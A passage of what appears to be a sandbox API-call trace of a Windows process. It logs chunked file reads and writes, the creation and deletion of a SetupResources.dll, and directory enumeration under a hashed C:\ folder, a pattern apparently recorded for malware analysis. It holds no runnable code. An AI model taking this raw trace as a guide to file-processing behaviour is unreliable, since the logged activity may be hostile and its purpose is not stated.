lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.356] GetLastError () returned 0x0 [0072.356] SetLastError (dwErrCode=0x0) [0072.356] GetLastError () returned 0x0 [0072.356] SetLastError (dwErrCode=0x0) [0072.357] GetLastError () returned 0x0 [0072.357] SetLastError (dwErrCode=0x0) [0072.357] GetLastError () returned 0x0 [0072.357] SetLastError (dwErrCode=0x0) [0072.357] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.357] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.357] GetLastError () returned 0x0 [0072.357] SetLastError (dwErrCode=0x0) [0072.357] GetLastError () returned 0x0 [0072.357] SetLastError (dwErrCode=0x0) [0072.357] GetLastError () returned 0x0 [0072.357] SetLastError (dwErrCode=0x0) [0072.358] GetLastError () returned 0x0 [0072.358] SetLastError (dwErrCode=0x0) [0072.358] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x958, lpOverlapped=0x0) returned 1 [0072.358] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.358] GetLastError () returned 0x0 [0072.358] SetLastError (dwErrCode=0x0) [0072.358] GetLastError () returned 0x0 [0072.358] SetLastError (dwErrCode=0x0) [0072.358] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.358] GetLastError () returned 0x0 [0072.358] SetLastError (dwErrCode=0x0) [0072.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0072.359] GetLastError () returned 0x0 [0072.359] SetLastError (dwErrCode=0x0) [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0072.359] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x960, lpOverlapped=0x0) returned 1 [0072.359] GetLastError () returned 0x0 [0072.359] SetLastError (dwErrCode=0x0) [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.359] GetLastError () returned 0x0 [0072.359] SetLastError (dwErrCode=0x0) [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.359] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.359] CloseHandle (hObject=0x410) returned 1 [0072.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.361] CloseHandle (hObject=0x418) returned 1 [0072.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.361] AreFileApisANSI () returned 1 [0072.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0072.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0072.361] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.362] GetFileType (hFile=0x418) returned 0x1 [0072.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.362] GetLastError () returned 0xb7 [0072.362] SetLastError (dwErrCode=0xb7) [0072.362] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.363] CloseHandle (hObject=0x418) returned 1 [0072.364] AreFileApisANSI () returned 1 [0072.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0072.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0072.364] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.365] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧脐\x07̧비聐蚀\x08賂̧")) returned 0 [0072.365] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0072.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0072.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0072.366] AreFileApisANSI () returned 1 [0072.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076", lpUsedDefaultChar=0x0) returned 27 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0072.366] AreFileApisANSI () returned 1 [0072.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0072.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78090 [0072.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78090, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076") returned 27 [0072.367] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076" (normalized: "c:\\588bce7c90097ed212\\3076"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.367] GetLastError () returned 0x5 [0072.367] GetLastError () returned 0x5 [0072.367] SetLastError (dwErrCode=0x5) [0072.426] GetLastError () returned 0x5 [0072.426] SetLastError (dwErrCode=0x5) [0072.426] GetLastError () returned 0x5 [0072.426] SetLastError (dwErrCode=0x5) [0072.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78090 | out: hHeap=0x20000) returned 1 [0072.450] AreFileApisANSI () returned 1 [0072.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0072.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78490 [0072.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x78490, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076") returned 27 [0072.461] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076" (normalized: "c:\\588bce7c90097ed212\\3076"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.461] GetLastError () returned 0x5 [0072.461] GetLastError () returned 0x5 [0072.461] SetLastError (dwErrCode=0x5) [0072.461] GetLastError () returned 0x5 [0072.461] SetLastError (dwErrCode=0x5) [0072.462] GetLastError () returned 0x5 [0072.462] SetLastError (dwErrCode=0x5) [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78490 | out: hHeap=0x20000) returned 1 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0072.462] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="3082", cAlternateFileName="")) returned 1 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0072.462] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78350 [0072.462] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.462] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0072.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0072.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0072.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.463] AreFileApisANSI () returned 1 [0072.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.464] AreFileApisANSI () returned 1 [0072.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x694e0 [0072.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0072.464] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.464] GetFileType (hFile=0x418) returned 0x1 [0072.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0072.464] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.464] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 